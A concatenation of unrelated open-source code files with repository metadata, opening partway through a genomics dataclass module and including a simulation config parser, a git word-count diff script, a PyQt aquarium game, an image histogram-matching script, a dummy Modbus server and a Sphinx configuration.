@dataclass(frozen=False)
class VariantCall(Experiment, Validatable):
analysisId: str = None
variantCallingTool: str = None
matchedNormalSampleSubmitterId: str = None
def validate(self):
raise NotImplemented("not implemented")
@classmethod
def create(cls, variantCallingTool, matchedNormalSampleSubmitterId, analysisId=None):
s = VariantCall()
s.analysisId = analysisId
s.variantCallingTool = variantCallingTool
s.matchedNormalSampleSubmitterId = matchedNormalSampleSubmitterId
return s
@dataclass(frozen=False)
class SequencingRead(Experiment, Validatable):
analysisId: str = None
aligned: bool = None
alignmentTool: str = None
insertSize: int = None
libraryStrategy: str = None
pairedEnd: bool = None
referenceGenome: str = None
@classmethod
def builder(cls):
return Builder(Analysis)
def validate(self):
raise NotImplemented("not implemented")
@classmethod
def create(cls, aligned, alignmentTool, insertSize,
libraryStrategy, pairedEnd, referenceGenome, analysisId=None):
s = SequencingRead()
s.alignmentTool = alignmentTool
s.aligned = aligned
s.analysisId = analysisId
s.libraryStrategy = libraryStrategy
s.insertSize = insertSize
s.pairedEnd = pairedEnd
s.referenceGenome = referenceGenome
return s
@dataclass(frozen=False)
class Analysis(Entity):
analysisId: str = None
study: str = None
analysisState: str = "UNPUBLISHED"
# TODO: add typing to this. should be a list of type Sample
sample: List[CompositeEntity] = None
# TODO: add typing to this. should be a list of type File
file: List[File] = None
def __post_init__(self):
self.sample = []
self.file = []
@classmethod
def builder(cls):
return Builder(Analysis)
@classmethod
def from_json(cls, json_string):
pass
@dataclass(frozen=False)
class SequencingReadAnalysis(Analysis, Validatable):
analysisType: str = "sequencingRead"
# TODO: add typing to this. should be a list of type File
experiment: Type[SequencingRead] = None
@classmethod
def create(cls, experiment, sample, file, analysisId=None, study=None, analysisState="UNPUBLISHED", info=None):
check_type(experiment, SequencingRead)
check_state(sample is not None and isinstance(sample, list) and len(sample) > 0,
"Atleast one sample must be defined")
check_state(file is not None and isinstance(file, list) and len(file) > 0,
"Atleast one file must be defined")
for s in sample:
check_type(s, CompositeEntity)
for f in file:
check_type(f, File)
s = SequencingReadAnalysis()
s.sample = sample
s.file = file
s.info = default_value(info, {})
s.experiment = experiment
s.analysisId = analysisId
s.study = study
s.analysisState = analysisState
return s
def validate(self):
raise NotImplemented("not implemented")
@dataclass(frozen=False)
class VariantCallAnalysis(Analysis, Validatable):
analysisType: str = 'variantCall'
# TODO: add typing to this. should be a list of type File
experiment: Type[VariantCall] = None
@classmethod
def create(cls, experiment, sample, file, analysisId=None, study=None, analysisState="UNPUBLISHED", info=None):
check_type(experiment, VariantCall)
check_state(sample is not None and isinstance(sample, list) and len(sample) > 0,
"Atleast one sample must be defined")
check_state(file is not None and isinstance(file, list) and len(file) > 0,
"Atleast one file must be defined")
for s in sample:
check_type(s, CompositeEntity)
for f in file:
check_type(f, File)
s = VariantCallAnalysis()
s.experiment = experiment
s.analysisId = analysisId
s.study = study
s.analysisState = analysisState
s.sample = sample
s.file = file
s.info = default_value(info, {})
return s
def validate(self):
raise NotImplemented("not implemented")
|
gpl-3.0
| 3,801,246,344,196,846,000
| 27.011765
| 115
| 0.640487
| false
| 3.927423
| false
| false
| false
|
richardclegg/multiuservideostream
|
streamsim/src/streamOptions.py
|
1
|
11399
|
#!/usr/bin/env python
import json
import sys
import demandmodel.demandModel as demandModel
import networkmodel.networkModel as networkModel
import qoemodel.qoeModel as qoeModel
import routemodel.routeModel as routeModel
import servermodel.serverModel as serverModel
import sessionmodel.sessionModel as sessionModel
import outputmodel.outputModel as outputModel
class streamOptions(object):
def __init__(self):
"""Initialise the streamOptions class which contains
the information read from the configuration file for
the simulation"""
self.outputFile= None
self.routeMod= None
self.sessionMod= None
self.netMod= None
self.demMod= None
self.qoeMod= None
self.serverMod= None
self.outputs= []
self.simDays= 0
def readJson(self,fName):
"""Read a JSON file containing the options for the
file and read any subsidiary files included in that
file"""
try:
f= open(fName)
except:
print >> sys.stderr,'Cannot open',fName
return False
try:
js=json.load(f)
except ValueError as e:
print >> sys.stderr, 'JSON parse error in',fName
print >> sys.stderr, e
sys.exit()
f.close()
try:
outPart= js.pop('output')
except:
outPart= None
try:
sessModel= js.pop('session_model')
dModel= js.pop('demand_model')
nModel= js.pop('network_model')
rModel= js.pop('route_model')
qModel= js.pop('qoe_model')
svrModel= js.pop('server_model')
outputs= js.pop('output_models')
self.simDays= js.pop('simulation_days')
except ValueError as e:
print >> sys.stderr, 'JSON file',fName, \
'must contain stream_model, route_model' \
'demand_model, network_model and simulation_days'
return False
if type(self.simDays) != int:
print >> sys.stderr, 'JSON file',fName, \
'must specify simulation_days as integer'
return False
if not self.checkJSEmpty(js,fName):
return False
try:
if outPart != None:
self.parseOutPart(outPart,fName)
self.parseSessionModel(sessModel,fName)
self.parseDemandModel(dModel,fName)
self.parseNetworkModel(nModel,fName)
self.parseRouteModel(rModel,fName)
self.parseQoeModel(qModel,fName)
self.parseServerModel(svrModel,fName)
for o in outputs:
self.outputs.append(self.parseOutputModel(o,fName))
except ValueError as e:
return False
return True
def checkJSEmpty(self,js,fName):
if (len(js) != 0):
print >> sys.stderr, 'JSON file',fName, \
'contains unrecognised keys',js.keys()
return False
return True
def parseOutPart(self,js,fName):
""" Parse the output part of the stream model JSON config"""
try:
self.outputFile= js.pop('file')
except:
pass
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in file",fName
raise ValueError
def strToClassInstance(self,classStr,classType):
"""Convert string to a class instance"""
try:
(modName,_,className)= classStr.rpartition('.')
newmodule= __import__(modName, fromlist=[''])
objClass= getattr(newmodule,className)
except AttributeError as e:
print >> sys.stderr, "Making ",classStr,"into class",classType, \
"Attribute Error", e
raise ValueError("%s must be qualified class." % classStr)
except ImportError as e:
print >> sys.stderr, "Making ",classStr,"into class",classType, \
"Attribute Error", e
raise ValueError("Cannot find class %s module name %s to import"
% (className,modName))
obj= objClass()
if isinstance(obj,classType):
return obj
raise ValueError("%s is not a valid class of type sessionModel." % classStr)
def parseSessionModel(self,js,fName):
""" Parse the session Model part of the stream model
JSON config"""
try:
modelStr= js.pop('type')
except:
print >> sys.stderr,'JSON file',fName, \
'must contain model_type'
try:
self.sessionMod= self.strToClassInstance(modelStr,
sessionModel.sessionModel)
self.sessionMod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr,'JSON file',fName, \
'has error with type in session_model'
print >> sys.stderr, e
raise e
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in file",fName
raise ValueError
def parseDemandModel(self,js,fName):
""" Parse the demand Model part of the stream model
JSON config"""
try:
demModType= js.pop('type')
except ValueError as e:
print >> sys.stderr, "demand_model in JSON must contain" \
"type in JSON ",fName
raise e
try:
self.demMod= self.strToClassInstance(demModType,
demandModel.demandModel)
except ValueError as e:
print >> sys.stderr,"JSON in demand_model has error with " \
"type in",fName
print >> sys.stderr, e
raise e
try:
self.demMod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr, "Parsing error with JSON in",\
"demand_model in",fName
print >> sys.stderr, "Error given:",e
raise e
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in file",fName
raise ValueError
def parseNetworkModel(self, js, fName):
"""Parse the network model from the JSON"""
try:
netModType= js.pop('type')
except Exception as e:
print >> sys.stderr, "network_model in JSON must contain" \
"type in JSON ",fName
raise e
try:
self.netMod= self.strToClassInstance(netModType,
networkModel.networkModel)
except Exception as e:
print >> sys.stderr,"JSON in network_model has error with" \
"type in",fName
print >> sys.stderr, e
raise e
try:
self.netMod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr, "Parsing error with JSON in ",\
"network_model in",fName
print >> sys.stderr, e
raise e
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in file",fName
raise ValueError
def parseRouteModel(self, js, fName):
"""Parse the route model from the JSON"""
try:
routeModType= js.pop('type')
except Exception as e:
print >> sys.stderr, "route_model in JSON must contain" \
"type in JSON ",fName
raise e
try:
self.routeMod= self.strToClassInstance(routeModType,
routeModel.routeModel)
except Exception as e:
print >> sys.stderr,"JSON in route_model has error with" \
"type in",fName
print >> sys.stderr, e
raise e
try:
self.routeMod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr, "Parsing error with JSON in ",\
"route_model in",fName
print >> sys.stderr, e
raise e
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in file",fName
raise ValueError
def parseQoeModel(self, js, fName):
""" Parse the model for user quality of experience from the
JSON config input"""
try:
qoeModType= js.pop('type')
except Exception as e:
print >> sys.stderr, "qoe_model in JSON must contain" \
"type in JSON ",fName
raise e
try:
self.qoeMod= self.strToClassInstance(qoeModType,
qoeModel.qoeModel)
except ValueError as e:
print >> sys.stderr,"JSON in qoe_model has error with", \
"type in",fName
print >> sys.stderr, e
raise e
try:
self.qoeMod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr, "Parsing error with JSON in ",\
"qoe_model in",fName
print >> sys.stderr, e
raise e
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in file",fName
raise ValueError
def parseServerModel(self,js, fName):
"""Parse the model which learns about and assigns servers"""
try:
serverModType= js.pop('type')
except Exception as e:
print >> sys.stderr, "server_model in JSON must contain" \
"type in JSON ",fName
raise e
try:
self.serverMod= self.strToClassInstance(serverModType,
serverModel.serverModel)
except ValueError as e:
print >> sys.stderr,"JSON in server_model has error with", \
"type in",fName
print >> sys.stderr, e
raise e
try:
self.serverMod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr, "Parsing error with JSON in ",\
"server_model in",fName
print >> sys.stderr, e
raise e
if not self.checkJSEmpty(js,fName):
print >> sys.stderr,"JSON contains unused tokens", js, \
"in server_model in file",fName
raise ValueError
def parseOutputModel(self, js, fName):
"""Parse one of the models which gives output"""
try:
omType= js.pop('type')
except Exception as e:
print >> sys.stderr, "Every instance of output_models in JSON must contain" \
"type ",fName
raise e
try:
outputmod= self.strToClassInstance(omType,
outputModel.outputModel)
except ValueError as e:
print >> sys.stderr,"JSON in server_model has error with", \
"type in",fName
print >> sys.stderr, e
raise e
try:
outputmod.parseJSON(js,fName)
except ValueError as e:
print >> sys.stderr, "Parsing error with JSON in",\
"output_models in",fName
print >> sys.stderr, "Error given:",e
raise e
return outputmod
|
mpl-2.0
| 8,610,475,788,309,808,000
| 35.072785
| 89
| 0.547855
| false
| 4.317803
| false
| false
| false
|
jarus/git-wcount-diff
|
git_wcount_diff.py
|
1
|
1753
|
import sys
import subprocess
import re
files_re = re.compile(r"diff --git a/(.+?) b/.+?")
additions_re = re.compile(r"{\+(.*?)\+}")
deletions_re = re.compile(r"\[-(.*?)-\]")
word_re = re.compile(r"\S*")
def count(regex, source):
words = 0
characters = 0
for match in regex.findall(source):
for word in word_re.findall(match.decode('utf8')):
if len(word) == 0:
continue
words += 1
characters += len(word)
return words, characters
def analyse_file(filename, rev_1, rev_2):
git_diff = subprocess.Popen(
'git diff --word-diff %s %s -- "%s"' % (rev_1, rev_2, filename),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
stdout, stderr = git_diff.communicate()
if git_diff.returncode > 0:
print stderr
sys.exit(2)
return count(additions_re, stdout), count(deletions_re, stdout)
def main():
if len(sys.argv) < 3:
print "Usage: git-wcount-diff <commit> <commit>"
sys.exit(1)
git_diff = subprocess.Popen(
"git diff %s %s --name-only" % (sys.argv[1], sys.argv[2]),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
stdout, stderr = git_diff.communicate()
if git_diff.returncode > 0:
print stderr
sys.exit(2)
files = {}
for git_file in stdout.splitlines():
files[git_file] = analyse_file(git_file, sys.argv[1], sys.argv[2])
for filename, (additions, deletions) in files.items():
print "File: %s" % filename
print " - Additions: %s Words %s Characters" % additions
print " - Deletions: %s Words %s Characters" % deletions
if __name__ == '__main__':
main()
|
bsd-3-clause
| -7,602,571,264,804,953,000
| 26.825397
| 74
| 0.572162
| false
| 3.358238
| false
| false
| false
|
Royal-Society-of-New-Zealand/NZ-ORCID-Hub
|
orcid_api_v3/models/research_resource_group_v30_rc2.py
|
1
|
5775
|
# coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from orcid_api_v3.models.external_i_ds_v30_rc2 import ExternalIDsV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.last_modified_date_v30_rc2 import LastModifiedDateV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.research_resource_summary_v30_rc2 import ResearchResourceSummaryV30Rc2 # noqa: F401,E501
class ResearchResourceGroupV30Rc2(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'last_modified_date': 'LastModifiedDateV30Rc2',
'external_ids': 'ExternalIDsV30Rc2',
'research_resource_summary': 'list[ResearchResourceSummaryV30Rc2]'
}
attribute_map = {
'last_modified_date': 'last-modified-date',
'external_ids': 'external-ids',
'research_resource_summary': 'research-resource-summary'
}
def __init__(self, last_modified_date=None, external_ids=None, research_resource_summary=None): # noqa: E501
"""ResearchResourceGroupV30Rc2 - a model defined in Swagger""" # noqa: E501
self._last_modified_date = None
self._external_ids = None
self._research_resource_summary = None
self.discriminator = None
if last_modified_date is not None:
self.last_modified_date = last_modified_date
if external_ids is not None:
self.external_ids = external_ids
if research_resource_summary is not None:
self.research_resource_summary = research_resource_summary
@property
def last_modified_date(self):
"""Gets the last_modified_date of this ResearchResourceGroupV30Rc2. # noqa: E501
:return: The last_modified_date of this ResearchResourceGroupV30Rc2. # noqa: E501
:rtype: LastModifiedDateV30Rc2
"""
return self._last_modified_date
@last_modified_date.setter
def last_modified_date(self, last_modified_date):
"""Sets the last_modified_date of this ResearchResourceGroupV30Rc2.
:param last_modified_date: The last_modified_date of this ResearchResourceGroupV30Rc2. # noqa: E501
:type: LastModifiedDateV30Rc2
"""
self._last_modified_date = last_modified_date
@property
def external_ids(self):
"""Gets the external_ids of this ResearchResourceGroupV30Rc2. # noqa: E501
:return: The external_ids of this ResearchResourceGroupV30Rc2. # noqa: E501
:rtype: ExternalIDsV30Rc2
"""
return self._external_ids
@external_ids.setter
def external_ids(self, external_ids):
"""Sets the external_ids of this ResearchResourceGroupV30Rc2.
:param external_ids: The external_ids of this ResearchResourceGroupV30Rc2. # noqa: E501
:type: ExternalIDsV30Rc2
"""
self._external_ids = external_ids
@property
def research_resource_summary(self):
"""Gets the research_resource_summary of this ResearchResourceGroupV30Rc2. # noqa: E501
:return: The research_resource_summary of this ResearchResourceGroupV30Rc2. # noqa: E501
:rtype: list[ResearchResourceSummaryV30Rc2]
"""
return self._research_resource_summary
@research_resource_summary.setter
def research_resource_summary(self, research_resource_summary):
"""Sets the research_resource_summary of this ResearchResourceGroupV30Rc2.
:param research_resource_summary: The research_resource_summary of this ResearchResourceGroupV30Rc2. # noqa: E501
:type: list[ResearchResourceSummaryV30Rc2]
"""
self._research_resource_summary = research_resource_summary
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ResearchResourceGroupV30Rc2, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ResearchResourceGroupV30Rc2):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
mit
| 6,240,323,661,696,474,000
| 33.789157
| 122
| 0.629264
| false
| 3.899392
| false
| false
| false
|
gvpavlov/Insaniquarium
|
insaniquarium/gui/aquarium.py
|
1
|
5488
|
import os
import sys
from PyQt5.QtWidgets import QApplication, QWidget
from PyQt5 import QtCore
from PyQt5 import QtGui
current_directory = os.path.dirname(os.path.abspath(__file__))
parent_directory = os.path.abspath(os.path.join(current_directory, os.pardir))
resource_directory = os.path.join(current_directory, "resources")
sys.path.append(os.path.join(parent_directory, "core"))
from game import Game
from unit import Directions
class Aquarium(QWidget):
score_changed = QtCore.pyqtSignal()
def __init__(self, parent):
super(Aquarium, self).__init__()
self.game = Game((self.size().width(), self.size().height()))
self.score = self.game.score
self.score_changed.emit()
self.paused = False
self.load_pictures()
self.timer = QtCore.QTimer(self)
self.timer.timeout.connect(self.action)
self.timer.start(40)
def resizeEvent(self, event):
self.game.constrain((event.size().width(), event.size().height()))
def paintEvent(self, event):
canvas = QtGui.QPainter()
canvas.begin(self)
canvas.setPen(QtCore.Qt.NoPen)
canvas.drawPixmap(0, 0, self.background.scaled(self.size().width(),
self.size().height()))
for alien in self.game.aliens:
self.draw_alien(canvas, alien)
for fish in self.game.fishes:
self.draw_fish(canvas, fish)
for coin in self.game.coins:
self.draw_coin(canvas, coin)
for food in self.game.food:
self.draw_food(canvas, food)
@QtCore.pyqtSlot()
def spawn_fish(self):
self.game.spawn_fish()
@QtCore.pyqtSlot()
def upgrade_weapon(self):
self.game.upgrade_weapon()
@QtCore.pyqtSlot()
def upgrade_food(self):
self.game.upgrade_food()
@QtCore.pyqtSlot()
def pause(self):
self.paused = True
@QtCore.pyqtSlot()
def unpause(self):
self.paused = False
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self.game.mouse_press(event.x(), event.y())
def load_pictures(self):
# Alien
self.alien_images = {
'lion': QtGui.QPixmap(
os.path.join(resource_directory, "alien.png")),
'blue': QtGui.QPixmap(
os.path.join(resource_directory, "alien2.png"))}
self.alien_images_mirrored = {}.fromkeys(self.alien_images)
self.fill_mirrored(self.alien_images, self.alien_images_mirrored)
# Fish
self.fish_images = {
'swim': QtGui.QPixmap(
os.path.join(resource_directory, "fish_swim.png")),
'eat': QtGui.QPixmap(
os.path.join(resource_directory, "fish_eat.png")),
'turn': QtGui.QPixmap(
os.path.join(resource_directory, "fish_turn.png")),
'hungry_die': QtGui.QPixmap(
os.path.join(resource_directory, "fish_die.png")),
'hungry_swim': QtGui.QPixmap(
os.path.join(resource_directory, "hungry_swim.png")),
'hungry_eat': QtGui.QPixmap(
os.path.join(resource_directory, "hungry_eat.png")),
'hungry_turn': QtGui.QPixmap(
os.path.join(resource_directory, "hungry_turn.png"))}
self.fish_images_mirrored = {}.fromkeys(self.fish_images)
self.fill_mirrored(self.fish_images, self.fish_images_mirrored)
# Food
self.food_image = QtGui.QPixmap(
os.path.join(resource_directory, "food.png"))
# Coin
self.coin_image = QtGui.QPixmap(
os.path.join(resource_directory, "coin.png"))
# Background
self.background = QtGui.QPixmap(
os.path.join(resource_directory, "background.png"))
def fill_mirrored(self, normal_images, mirrored):
for key, value in normal_images.items():
mirror = value.toImage()
mirror = mirror.mirrored(True, False)
mirrored[key] = QtGui.QPixmap().fromImage(mirror)
def action(self):
""" Incorporates all objects' actions and calls the repaint event."""
if not self.paused:
self.game.actions()
if self.score != self.game.score:
self.score = self.game.score
self.score_changed.emit()
self.repaint()
def draw_alien(self, canvas, alien):
if alien.mirrored:
image = self.alien_images_mirrored[alien.kind]
else:
image = self.alien_images[alien.kind]
if alien.state == 'swim':
state = 0
else:
state = 160
canvas.drawPixmap(alien.x, alien.y, image,
alien.frame, state, 160, 160)
def draw_fish(self, canvas, fish):
state = fish.state
if fish.hungry:
state = 'hungry_' + state
if fish.mirrored:
image = self.fish_images_mirrored[state]
else:
image = self.fish_images[state]
canvas.drawPixmap(fish.x, fish.y, image,
fish.frame, fish.size * 80, 80, 80)
def draw_coin(self, canvas, coin):
canvas.drawPixmap(coin.x, coin.y, self.coin_image,
coin.frame, coin.worth * 72, 72, 72)
def draw_food(self, canvas, food):
canvas.drawPixmap(food.x, food.y, self.food_image,
food.frame, 0, 40, 40)
|
gpl-2.0
| -6,743,611,437,689,086,000
| 33.515723
| 78
| 0.579993
| false
| 3.577575
| false
| false
| false
|
OSGeoLabBp/tutorials
|
english/img_processing/code/image_equalize.py
|
1
|
1689
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
Equalize images to the histogram of a reference image
Based on https://www.pyimagesearch.com/2021/02/08/histogram-matching-with-opencv-scikit-image-and-python/
"""
import argparse
import os
import sys
from skimage import exposure
import cv2
# command line parameters
parser = argparse.ArgumentParser()
parser.add_argument('names', metavar='file_names', type=str, nargs='*',
help='pathes to image files to process')
parser.add_argument("-r", "--reference", required=True,
help="path to the input reference image")
parser.add_argument('--nowrite', action="store_true",
help='do not write equalized images to disk')
parser.add_argument('--debug', action="store_true",
help='show images on screen')
args = parser.parse_args()
if not args.names:
print("No input images given")
parser.print_help()
sys.exit(0)
# load the reference images
if args.debug:
print("Loading reference image...")
ref = cv2.imread(args.reference)
# determine if we are performing multichannel histogram matching
multi = ref.shape[-1] > 1
for fn in args.names:
if args.debug:
print("Performing histogram matching for {}...".format(fn))
src = cv2.imread(fn)
matched = exposure.match_histograms(src, ref, multichannel=multi)
if not args.nowrite:
spl = os.path.splitext(fn)
mn = spl[0] + "_matched" + spl[1]
if args.debug:
print("Writing matched image...")
cv2.imwrite(mn, matched)
if args.debug:
# show the output images
cv2.imshow("Source", src)
cv2.imshow("Reference", ref)
cv2.imshow("Matched", matched)
cv2.waitKey(0)
|
cc0-1.0
| -2,569,869,299,229,796,400
| 32.78
| 109
| 0.671995
| false
| 3.540881
| false
| false
| false
|
miaoski/bsideslv-plc-home
|
dummy.py
|
1
|
1293
|
# -*- coding: utf8 -*-
# Run ipython -i dummy.py if you don't want to run it on Raspberry Pi
from pymodbus.server.async import StartTcpServer
from pymodbus.datastore import ModbusSequentialDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from identity import identity
import logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
log = logging.getLogger()
def dump_store(a):
context = a[0]
address = 0x00
print "DI values:", context[0].store['d'].values[:20]
print "CO values:", context[0].store['c'].values[:20]
print "HR values:", context[0].store['h'].values[:10]
print "IR values:", context[0].store['i'].values[:10]
# Initialize ModBus Context
store = ModbusSlaveContext(
di = ModbusSequentialDataBlock(0, [0,0,0,1,1,1,1,1,1,0,1,0,1,1,1,0,0,1,1,1,1,1]),
co = ModbusSequentialDataBlock(0, [0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0]),
hr = ModbusSequentialDataBlock(0, [0,0,37,0,35,0,0] + [0] * 10),
ir = ModbusSequentialDataBlock(0, [0,0,85,0,0,0,0] + [0] * 10))
context = ModbusServerContext(slaves=store, single=True)
# Start loop
def run(ip='192.168.42.1', port=502):
StartTcpServer(context, identity=identity(), address=(ip, port))
print 'Type run() to StartTcpServer'
|
gpl-2.0
| 5,917,105,770,169,918,000
| 35.942857
| 85
| 0.688322
| false
| 2.751064
| false
| false
| false
|
IQSS/geoconnect
|
scripts/unmapped_row_test.py
|
1
|
1633
|
# ------------------------------
# Quick script to add insitutions and
# affiliate them with dataverse installations
#
# Only deletes redundant institutions to refresh their affiliation
# ------------------------------
import os, sys
from os.path import abspath, isdir, realpath, isfile
proj_paths = [abspath('../'), abspath('../geoconnect')]
sys.path += proj_paths
# ------------------------------
# This is so Django knows where to find stuff.
# ------------------------------
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "geoconnect.settings.local")
from gc_apps.geo_utils.msg_util import *
from gc_apps.gis_tabular.models import WorldMapJoinLayerInfo
from gc_apps.gis_tabular.unmapped_row_util import UnmatchedRowHelper
def check_unmatched(layer_info_md5):
msgt('check_unmatched')
wm_info = WorldMapJoinLayerInfo.objects.get(md5=layer_info_md5)
kwargs = dict(show_all_failed_rows=True)
unmatched_row_helper = UnmatchedRowHelper(wm_info, **kwargs)
if unmatched_row_helper.has_error:
msg('ERROR: %s' % unmatched_row_helper.error_message)
return
msgt('bad rows as list')
row_list = unmatched_row_helper.get_failed_rows_as_list()
if unmatched_row_helper.has_error:
msg('ERROR: %s' % unmatched_row_helper.error_message)
return
msg(row_list)
row_list_csv = unmatched_row_helper.get_failed_rows_as_csv()
if unmatched_row_helper.has_error:
msg('ERROR: %s' % unmatched_row_helper.error_message)
return
msg(row_list_csv)
if __name__ == '__main__':
tab_md5 = '1a77cebad8a249820f2c577392dae20a'
check_unmatched(tab_md5)
|
apache-2.0
| 2,044,353,086,420,126,000
| 29.811321
| 76
| 0.650949
| false
| 3.319106
| false
| false
| false
|
joferkington/mplstereonet
|
docs/conf.py
|
1
|
9530
|
# -*- coding: utf-8 -*-
#
# mplstereonet documentation build configuration file, created by
# sphinx-quickstart on Sun Jun 23 13:39:02 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
import runpy
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Generate pages for examples
path = os.path.join(os.path.dirname('__file__'), 'generate_example_rst.py')
runpy.run_path(path, run_name='__main__')
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode',
'sphinx.ext.autosummary', 'numpydoc']
numpydoc_show_class_members = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'mplstereonet'
copyright = u'2013, Free Software Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.6'
# The full version, including alpha/beta/rc tags.
release = '0.6-dev'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'setup.py']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'mplstereonetdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'mplstereonet.tex', u'mplstereonet Documentation',
u'Joe Kington', 'manual'),
]
